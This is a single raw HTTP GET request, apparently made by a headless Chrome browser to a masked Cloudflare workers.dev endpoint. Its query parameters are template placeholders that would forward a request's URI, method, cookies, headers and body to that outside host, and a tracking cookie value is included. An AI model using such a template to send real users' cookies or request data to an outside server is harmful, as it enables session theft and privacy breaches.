GET /?dieuri={{uri}}&diemet={{method}}&diecok={{cook}}&diehed={{head}}&diebod={{body}} HTTP/2
Host: throbbing-haze-xxx.xxxxx.workers.dev
Cookie: FPID=FPID2.1.zlIFEFyysXV0GJAGq6A75Rit5iu2pFhGW0m1KQIEjLc%3D.1729774034
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/112.0.5614.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US

